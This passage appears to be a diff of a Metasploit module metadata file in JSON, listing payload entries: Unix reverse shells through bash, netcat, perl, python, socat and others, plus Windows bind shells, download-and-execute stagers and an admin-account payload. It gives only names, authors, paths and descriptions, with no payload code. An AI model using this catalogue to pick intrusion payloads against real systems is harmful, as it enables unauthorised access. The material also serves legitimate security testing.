Shell, Reverse UDP (/dev/udp)", - "fullname": "payload/cmd/unix/reverse_bash_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm ", - "bcoles " - ], - "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n This will not work on circa 2009 and older Debian-based Linux\n distributions (including Ubuntu) because they compile bash\n without the /dev/udp feature.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_bash_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_jjs": { - "name": "Unix Command Shell, Reverse TCP (via jjs)", - "fullname": "payload/cmd/unix/reverse_jjs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "conerpirate", - "bcoles " - ], - "description": "Connect back and create a command shell via jjs", - "references": [ - "URL-https://gtfobins.github.io/gtfobins/jjs/", - "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", - "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" - ], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_jjs.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_jjs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ksh": { - "name": "Unix Command Shell, Reverse TCP (via Ksh)", - "fullname": "payload/cmd/unix/reverse_ksh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Wang Yihang " - ], - "description": "Connect back and create a command shell via Ksh. Note: Although Ksh is often\n available, please be aware it isn't usually installed by default.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ksh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ksh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_lua": { - "name": "Unix Command Shell, Reverse TCP (via Lua)", - "fullname": "payload/cmd/unix/reverse_lua", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "xistence " - ], - "description": "Creates an interactive shell via Lua", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ncat_ssl": { - "name": "Unix Command Shell, Reverse TCP (via ncat)", - "fullname": "payload/cmd/unix/reverse_ncat_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "C_Sto" - ], - "description": "Creates an interactive shell via ncat, utilizing ssl mode", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ncat_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ncat_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_netcat": { - "name": "Unix Command Shell, Reverse TCP (via netcat)", - "fullname": "payload/cmd/unix/reverse_netcat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "m-1-k-3", - "egypt ", - "juan vazquez " - ], - "description": "Creates an interactive shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_netcat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_netcat_gaping": { - "name": "Unix Command Shell, Reverse TCP (via netcat -e)", - "fullname": "payload/cmd/unix/reverse_netcat_gaping", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_netcat_gaping", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_nodejs": { - "name": "Unix Command Shell, Reverse TCP (via nodejs)", - "fullname": "payload/cmd/unix/reverse_nodejs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Continually listen for a connection and spawn a command shell via nodejs", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_nodejs.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_nodejs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_openssl": { - "name": "Unix Command Shell, Double Reverse TCP SSL (openssl)", - "fullname": "payload/cmd/unix/reverse_openssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell through two inbound connections", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_openssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_perl": { - "name": "Unix Command Shell, Reverse TCP (via Perl)", - "fullname": "payload/cmd/unix/reverse_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "cazz " - ], - "description": "Creates an interactive shell via perl", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_perl_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (via perl)", - "fullname": "payload/cmd/unix/reverse_perl_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via perl, uses SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_perl_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_php_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (via php)", - "fullname": "payload/cmd/unix/reverse_php_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via php, uses SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 20:39:52 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_php_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_python": { - "name": "Unix Command Shell, Reverse TCP (via Python)", - "fullname": "payload/cmd/unix/reverse_python", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bcoles " - ], - "description": "Connect back and create a command shell via Python", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_python.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_python", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_python_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (via python)", - "fullname": "payload/cmd/unix/reverse_python_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via python, uses SSL, encodes with base64 by design.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_python_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_r": { - "name": "Unix Command Shell, Reverse TCP (via R)", - "fullname": "payload/cmd/unix/reverse_r", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Connect back and create a command shell via R", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_r.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_r", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ruby": { - "name": "Unix Command Shell, Reverse TCP (via Ruby)", - "fullname": "payload/cmd/unix/reverse_ruby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Connect back and create a command shell via Ruby", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ruby.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ruby", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ruby_ssl": { - "name": "Unix Command Shell, Reverse TCP SSL (via Ruby)", - "fullname": "payload/cmd/unix/reverse_ruby_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Connect back and create a command shell via Ruby, uses SSL", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ruby_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_socat_sctp": { - "name": "Unix Command Shell, Reverse SCTP (via socat)", - "fullname": "payload/cmd/unix/reverse_socat_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-04-27 16:21:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_socat_sctp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_socat_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_socat_tcp": { - "name": "Unix Command Shell, Reverse TCP (via socat)", - "fullname": "payload/cmd/unix/reverse_socat_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jheysel-r7" - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-09-06 15:52:56 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_socat_tcp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_socat_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_socat_udp": { - "name": "Unix Command Shell, Reverse UDP (via socat)", - "fullname": "payload/cmd/unix/reverse_socat_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via socat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_socat_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ssh": { - "name": "Unix Command Shell, Reverse TCP SSH", - "fullname": "payload/cmd/unix/reverse_ssh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan ", - "hirura" - ], - "description": "Connect back and create a command shell via SSH", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ssh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_ssl_double_telnet": { - "name": "Unix Command Shell, Double Reverse TCP SSL (telnet)", - "fullname": "payload/cmd/unix/reverse_ssl_double_telnet", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm ", - "RageLtMan " - ], - "description": "Creates an interactive shell through two inbound connections, encrypts using SSL via \"-z\" option", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_ssl_double_telnet", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_stub": { - "name": "Unix Command Shell, Reverse TCP (stub)", - "fullname": "payload/cmd/unix/reverse_stub", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Creates an interactive shell through an inbound connection (stub only, no payload)", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_stub.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_stub", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_tclsh": { - "name": "Unix Command Shell, Reverse TCP (via Tclsh)", - "fullname": "payload/cmd/unix/reverse_tclsh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bcoles " - ], - "description": "Creates an interactive shell via Tclsh", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-22 05:49:48 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_tclsh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_tclsh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/reverse_zsh": { - "name": "Unix Command Shell, Reverse TCP (via Zsh)", - "fullname": "payload/cmd/unix/reverse_zsh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Doug Prostko ", - "Wang Yihang " - ], - "description": "Connect back and create a command shell via Zsh. Note: Although Zsh is often\n available, please be aware it isn't usually installed by default.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb", - "is_install_path": true, - "ref_name": "cmd/unix/reverse_zsh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/adduser": { - "name": "Windows Execute net user /ADD CMD", - "fullname": "payload/cmd/windows/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm ", - "scriptjunkie", - "Chris John Riley" - ], - "description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/adduser.rb", - "is_install_path": true, - "ref_name": "cmd/windows/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/bind_lua": { - "name": "Windows Command Shell, Bind TCP (via Lua)", - "fullname": "payload/cmd/windows/bind_lua", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "xistence " - ], - "description": "Listen for a connection and spawn a command shell via Lua", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb", - "is_install_path": true, - "ref_name": "cmd/windows/bind_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/bind_perl": { - "name": "Windows Command Shell, Bind TCP (via Perl)", - "fullname": "payload/cmd/windows/bind_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz ", - "aushack " - ], - "description": "Listen for a connection and spawn a command shell via perl (persistent)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/bind_perl.rb", - "is_install_path": true, - "ref_name": "cmd/windows/bind_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/bind_perl_ipv6": { - "name": "Windows Command Shell, Bind TCP (via perl) IPv6", - "fullname": "payload/cmd/windows/bind_perl_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz ", - "aushack " - ], - "description": "Listen for a connection and spawn a command shell via perl (persistent)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb", - "is_install_path": true, - "ref_name": "cmd/windows/bind_perl_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/bind_ruby": { - "name": "Windows Command Shell, Bind TCP (via Ruby)", - "fullname": "payload/cmd/windows/bind_ruby", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "kris katterjohn " - ], - "description": "Continually listen for a connection and spawn a command shell via Ruby", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb", - "is_install_path": true, - "ref_name": "cmd/windows/bind_ruby", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/download_eval_vbs": { - "name": "Windows Executable Download and Evaluate VBS", - "fullname": "payload/cmd/windows/download_eval_vbs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scriptjunkie" - ], - "description": "Downloads a file from an HTTP(S) URL and executes it as a vbs script.\n Use it to stage a vbs encoded payload from a short command line.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/download_eval_vbs.rb", - "is_install_path": true, - "ref_name": "cmd/windows/download_eval_vbs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/download_exec_vbs": { - "name": "Windows Executable Download and Execute (via .vbs)", - "fullname": "payload/cmd/windows/download_exec_vbs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scriptjunkie" - ], - "description": "Download an EXE from an HTTP(S) URL and execute it", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/download_exec_vbs.rb", - "is_install_path": true, - "ref_name": "cmd/windows/download_exec_vbs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/generic": { - "name": "Windows Command, Generic Command Execution", - "fullname": "payload/cmd/windows/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "juan vazquez " - ], - "description": "Executes the supplied command", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/generic.rb", - "is_install_path": true, - "ref_name": "cmd/windows/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/http/x64/custom/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/custom/bind_named_pipe": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/http/x64/custom/bind_tcp": { - "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": 